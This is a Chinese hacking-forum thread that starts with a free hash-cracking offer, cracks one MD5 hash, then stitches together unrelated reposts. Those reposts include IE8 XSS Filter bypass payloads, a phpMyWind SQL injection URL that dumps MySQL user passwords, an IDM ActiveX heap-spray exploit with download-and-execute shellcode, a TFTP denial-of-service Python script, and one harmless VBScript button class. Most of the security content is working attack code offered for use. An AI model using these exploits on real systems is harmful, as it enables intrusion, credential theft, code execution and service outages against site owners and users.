Board logo

标题: 限时免费查询cmd5.com收费记录 [打印本页]

作者: 無情    时间: 2014-9-27 23:05     标题: 限时免费查询cmd5.com收费记录

限时免费查询cmd5.com收费记录
        
       end date:未定

   

  不定期发放福利。
作者: webmaster    时间: 2014-9-28 14:39

不错,准确率挺高的!
作者: 無情    时间: 2014-9-28 15:55

[attach]1042[/attach]
作者: 0x01    时间: 2014-9-28 16:50

赞一个
  
求秒        15fd475a7b2cd5aab089edbc91a2e68b
作者: 無情    时间: 2014-9-28 16:53

回复 4# 0x01


15fd475a7b2cd5aab089edbc91a2e68b


查询结果:  
ahin10180234


作者: 0x01    时间: 2014-9-28 16:58

回复 5# 無情


    thx、、、·
作者: webmaster    时间: 2014-9-30 12:59

厉害,批量破解快么?
作者: sunkait    时间: 2014-10-25 12:17

支持支持楼主
作者: webmaster    时间: 2014-10-29 16:50

好吧都过期了!
作者: 無情    时间: 2015-7-2 11:02

回复 9# webmaster


暂时可以继续查。。
作者: xin0000    时间: 2019-5-18 19:05

IE8安全警告问题

漏洞说明:IE8是微软新推出的一款浏览器,其对CSS2.1的完整支持,HTML5的支持,内置开发工具等等。IE8在浏览器安全性上有非常大的改进,内置了一款无法卸载的Xss Filter,对非持久型跨站脚本攻击做了比较好的防护。但是80sec在测试IE8时,发现IE8在设计Xss Filter时存在逻辑上的错误,可能导致一些原本不存在漏洞的站点出现安全问题,并且IE8也并没有从根本上解决跨站脚本攻击问题,甚至针对非持久型跨站脚本攻击在变通攻击方法之后一样可能被利用。而在一些书写不严谨的web站点上,IE8的Xss Filter根本发挥不了任何作用。
漏洞站点:http://www.microsoft.com/<BR><BR>漏洞解析:通过我们研究后发现IE8的Xss Filter的基本原理是根据一些已知的攻击情况所集成的规则库来匹配书写的URL,如果匹配规则就发出警告,并且将站点回显的页面里的相关匹配内容替换成无危害的类型。这一过程存在很多问题
1 匹配的规则问题
IE8只能对一些已知的简单规则进行匹配,并且不能防止JavaScript Injection和一些Dom操作带来的XSS,对于持久型Xss更是无能为力。所以IE8在防止Xss方面只是做了非常非常小的一部。这一步对于一些书写不严谨的站点更是起不了任何作用。譬如一个Dom Xss[Thanks Luoluo]
Dom XSS In IE8
可以看到XSS一样触发。
2 如何在IE8下进行非持久XSS[该问题受同源策略影响]
IE8只是给人一种安全感,他并不能修复站点的安全漏洞。对于黑客来讲,他只需要把原来的XSS放到iframe里就一样可以用来攻击该站点,并不能从根本上解决跨站。譬如原来是
http://www.80sec.com/?url=&lt;script&gt;alert()&lt;/script&gt;
会被拦截,但是当你用
&lt;iframe src=’http://www.80sec.com/?url=&lt;script&gt;alert()&lt;/script&gt;’&gt;&lt;/iframe&gt;
一样可以利用,不过可能需要一些更深入的技巧。
3 IE8使很多的站点存在安全隐患
IE8的防护设计是当有违反规则的输入在URL里时,就把页面相应的内容给替换掉,而不管这个页面的内容是不是由用户输入造成的。黑客利用这一点,可以替换目标站点的某些代码,而实现这个只需要在地址后面加一个无关紧要的输入。如果被替换的内容涉及到一些页面逻辑,就可能被上下文利用,使用IE8的话,任何站点都可能成为攻击目标。
http://www.baidu.com/?80sec=&lt;meta%20http-equiv=Content-Type%20content=”text/html;charset=gb2312″&gt;
看看,在IE8下上面URL是不是乱了,当然,我们可以利用这个特性注释掉很多东西,如JS等等,都可以导致目标站点存在安全隐患,甚至被利用。
4. IE8的Xss Filter功能具有同源策略特性。
IE8的Xss Filter功能具有同源策略特性,相对于大部分非持久型XSS,如果攻击点来源于被攻击网站,将不会对XSS情况进行拦截。说明IE8的Xss Filter功能在设计时,决定完全信任来自本域的访问,例如
http://www.baidu.com/?xss=&lt;script&gt;alert(’xss’)
这类链接如果出现在www.baidu.com域内的页面被点击触发XSS漏洞,IE8的Xss Filter将不会拦截。
漏洞状态:等候官方回应


















公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: wlqc    时间: 2019-6-11 23:20

phpMyWind注入绕过知道创宇补丁
改完ID后第一次发帖,本来是说改个东邪,和西毒一起搞基的,谁知这货居然消失了,╮(╯▽╰)╭。
最近看知道创宇在微博上各种转发这个漏洞,就跑去T00Ls看了下,谁知看着看着,看到了另一个注入点,这尼玛人品也太好了O(∩_∩)O。
这个漏洞暂时我还想先玩一阵,所以各位先不要发到外面。
废话不多说了,看正文吧。
0x01 漏洞原理


漏洞在shoppingcart.php文件大约152行处:


<?php
  
                //初始化参数
                $totalprice = '';
                $shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart']));
  
                //显示订单列表
                foreach($shoppingcart as $k=>$goods)
                {
                ?>
                <tr>
                        <td height="30">
                        <?php
  
                        //获取数据库中商品信息
                        $r = $dosql->GetOne("SELECT * FROM `#@__goods` WHERE `id`=".$goods[0]);
//省略部分代码
可以从代码开始部分看到,$goods变量是从cookie中取出的shoppingcart字段值直接反序列化后的内容,没有进行任何的过滤和校验。
0x02 利用分析
我们先来整理下我们目前所获得的信息,我们可以通过控制cookie中的shoppingcart字段值来向代码中传入自定义内容,这部分内容是一个数组,并且第一个元素会没有经过任何校验和过滤带入到SQL查询中。
但是cookie中的这个字段会进行AuthCode的解码处理,这个处理需要用到服务端所使用到的key,这是我们无法获得的,所以我们需要找一个地方将我们所自定义的内容继续进行AuthCode的编码处理。我是怎么找到这个地方的呢?且听我慢慢到来。
这个漏洞是在看T00ls社区M3loee所公布的《T00ls元旦献礼之一:PhpMyWind SQL Injection 0day》时发现的。所以我们先来看下这个漏洞出现问题的分支部分代码:


if($a == 'addshopingcart')
{
  
         //省略部分代码
         
        //初始化购物车字符串
        if(!empty($_COOKIE['shoppingcart']))
                $shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart']));
        else
                $shoppingcart = array();
  
  
        //选中信息存入数组
        if(isset($goodsid) &amp;&amp;
           isset($buynum) &amp;&amp;
           isset($goodsattr))
        {
                $shoppingcart[] = array($goodsid, $buynum, $goodsattr);
        }
  
  
        //存入COOKIE
        setcookie('shoppingcart', AuthCode(serialize($shoppingcart),'ENCODE'));
        echo TRUE;
        exit();
}//省略部分代码
看到setcookie那行,就是对$shoppingcart变量内容进行序列化并发送至cookie。而phpMyWind的参数传递风格是使用for循环将GET和POST参数进行变量化的,就像DeDecms一样。这样的话,$goodsid、$buynum和$goodsattr三个变量的内容是可以控制的。再看$shoppingcart变量的赋值,可以发现之前那段代码中的goods[0]就是这里的$goodsid。
到这里我们重新整理下思路,在addshopingcart这个分支中,通过提交goodsid参数向$shoppingcart[0]中赋值,然后$shoppingcart被序列化发送到客户端。客户端再次访问这个页面,并发送刚刚得到的cookie,服务端将shoppingcart的值进行发序列化,并将数组中第一个元素的值带入到SQL查询中。
这样如果我们向goodsid中传递带有恶意查询的内容,就会造成SQL注入问题。并且我们还在后面的页面输出中发现这样一行代码:




echo '<a href="goodsshow.php?cid='.$r['classid'].'&amp;tid='.$r['typeid'].'&amp;id='.$r['id'].'" class="title" target="_blank">'.$r['title'].'</a>';
也就是说我们可以将注入结果放置到title这个字段中,就可以直接获取SQL查询的回显了,不再需要报错或者盲注了。
0x03 漏洞重现
首先访问




http://www.sitedirsec.com/shoppingcart.php?a=addshopingcart&amp;goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from mysql.user where 1=1 or @`'`&amp;buynum=1&amp;goodsattr=tpcs
然后访问


http://www.sitedirsec.com/phpmywind4.6.6/shoppingcart.php
,获取注入信息


















公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: llorri    时间: 2019-8-13 23:20

利用vbs类实现css按钮
<%rem 文章标题: 利用vbs类实现css按钮rem 作者:yanekrem 联系:aspboy@263.net
Class CssButton
  Public Name  Public BackColor  Public BorderColor  Public Font  Public FontColor  Public Width  Public Text  Public Url
  Public MouseOverColor
      Public Function GenerateStyleTag()    'Create the STYLE tag    Dim strStyle    strStyle =     "<STYLE TYPE=""text/css"">" &amp; vbCrLf &amp; _                   "<!--" &amp; vbCrLf &amp; _                   "#mybutton" &amp; Name &amp; "   {border-style: inset; " &amp; vbCrLf &amp; _                   "             border-color: " &amp; BorderColor &amp; ";" &amp; vbCrLf &amp; _                   "             background-color: " &amp; BackColor &amp; ";" &amp; vbCrLf &amp; _                   "             width: " &amp; Width &amp; ";" &amp; vbCrLf &amp; _                   "             text-align: center; }" &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; _                   "A.buttontext" &amp; Name &amp; " {color: " &amp; FontColor &amp; "; " &amp; vbCrLf &amp; _                   "              text-decoration: none; " &amp; vbCrLf &amp; _                   "              font: " &amp; Font &amp; ";" &amp; vbCrLf &amp; _                   "              cursor: hand; }" &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; _                   ".buttonover" &amp; Name &amp; " {color: " &amp; MouseOverColor &amp; ";" &amp; vbCrLf &amp; _                   "             text-decoration: none; " &amp; vbCrLf &amp; _                   "             font: " &amp; Font &amp; ";" &amp; vbCrLf &amp; _                   "             cursor: hand; }" &amp; vbCrLf &amp; _                   " // -->" &amp; vbCrLf &amp; _                   "</STYLE>"
    GenerateStyleTag = strStyle  End Function
  Public Function GenerateButtonTag()    Dim strHTML    strHTML = "<a href=""" &amp; Url &amp; """ class=""buttontext" &amp; Name &amp; """ " &amp; _              "onMouseOver=""this.className='buttonover" &amp; Name &amp; "';"" " &amp; _              "onMouseOut=""this.className='buttontext" &amp; Name &amp; "';"">" &amp; _              vbCrLf &amp; "<div id=""mybutton" &amp; Name &amp; """>" &amp; vbCrLf &amp; Text &amp; vbCrLf &amp; "</div></a>" &amp; vbCrLf
    GenerateButtonTag = strHTML  End Function
End Class
rem 建立类的实例
Dim btnYahoo, btnLycosSet btnYahoo = New CssButtonSet btnLycos = New CssButton
rem 设置按钮对象的相关属性
btnYahoo.BackColor = "#aaaaaa"btnYahoo.BorderColor = "#bbbbbb"btnYahoo.Font = "bold 12pt Verdana"btnYahoo.FontColor = "black"btnYahoo.Width = "80px"btnYahoo.MouseOverColor = "yellow"btnYahoo.Url = "http://www.yahoo.com/"btnYahoo.Name = "yahoo"btnYahoo.Text = "Yahoo!"
rem 调用方法输出按钮Response.Write btnYahoo.GenerateStyleTag()Response.Write btnYahoo.GenerateButtonTag()Response.Write "<p> </p>"
rem 设置按钮对象的相关属性btnLycos.BackColor = "#aaaaaa"btnLycos.BorderColor = "#bbbbbb"btnLycos.Font = "10pt Arial"btnLycos.FontColor = "black"btnLycos.Width = "70px"btnLycos.MouseOverColor = "yellow"btnLycos.Url = "http://www.lycos.com/"btnLycos.Name = "lycos"btnLycos.Text = "Lycos"
rem 调用方法输出按钮Response.Write btnLycos.GenerateStyleTag()Response.Write btnLycos.GenerateButtonTag()%>
演示:http://www.cnaspol.com/vbsclasscssbutton.asp


















公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: wwwsky    时间: 2019-9-24 23:55

用IDM搞定CCTV数字互动杂志
IDM远程溢出漏洞
下面给出利用代码:
<html><body><object classid="clsid:1931391E-5A3C-40D0-B4B1-5B542437C041" name="evil" width=100 height=200>  </object><script> var heapSprayToAddress = 0x21212121; var shellcode = unescape("%u9090"+"%u9090"+ "%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +"%u312f%u3732%u302e%u302e%u312e%u742f%u7365%u2f74" +"%u2e64%u7865%u0065");var heapBlockSize = 0x400000;var payLoadSize = shellcode.length * 2;var spraySlideSize = heapBlockSize - (payLoadSize+0x38);var spraySlide = unescape("%u0505%u0505");spraySlide = getSpraySlide(spraySlide,spraySlideSize);heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;memory = new Array();
for (i=0;i<heapBlocks;i++){  memory = spraySlide + shellcode;}
try {  var a=new Array(260);a=a+"bbbbccccd"+"!!!!"+"aaa";document.write(evil.IsOrdered(a)); } catch(e){}
function getSpraySlide(spraySlide, spraySlideSize){ while (spraySlide.length*2<spraySlideSize) {  spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide;}
</script></body></html>===============================================
<html><body><object classid="clsid:1931391E-5A3C-40D0-B4B1-5B542437C041" name="evil" width=100 height=200>  </object><script>  try {  var a=new Array(290);a=a+"bbbbccccd"+"!!!!"+"aaa";document.write(evil.IsOrdered(a)); } catch(e){}
</script></body></html>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: joli    时间: 2019-10-29 23:01

TFTP服务器拒绝服务漏洞
影响版本: Hillstone Software HS TFTP 1.3.2
发布日期: 02/12/2011
##############################################

SecPod ID: 1031                 
21/09/2011 Issue Discovered
                        
04/10/2011 Vendor Notified
                        
No Response from Vendor
                        
02/12/2011 Advisory Released
Overview:
---------
Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of
service vulnerability.


Technical Description:
----------------------
The vulnerability is caused due to improper validation of WRITE/READ Request
Parameter containing long file name, which allows remote attackers to crash
the service.


Impact:
--------
Successful exploitation could allow an attacker to cause denial of service
condition.


影响版本:
------------------
Hillstone Software HS TFTP 1.3.2


测试环境:
-----------
Hillstone Software HS TFTP 1.3.2 on Windows XP SP3 &amp; Win 7.
Older versions might be affected.


相关阅读:
-----------
http://secpod.org/blog/?p=419
http://www.hillstone-software.com/index.htm
http://www.hillstone-software.com/hs_tftp_details.htm
http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py


Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py


Solution:
----------
Not available


Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NOT_REQUIRED
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = PARTIAL
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
        Risk factor            = Medium


POC :
======

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

## File name >= 222 length leads to crash
exploit = "x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = x00x02
data = "x00x02" + exploit + "" + mode + ""

## READ command = x00x01
## data = "x00x01" + exploit + "" + mode + ""

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
    sock.connect()
except:
    print "Remote TFTP server port is down..."
    sys.exit(1)


















公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://sitedirsec.com/) Powered by Discuz! 7.2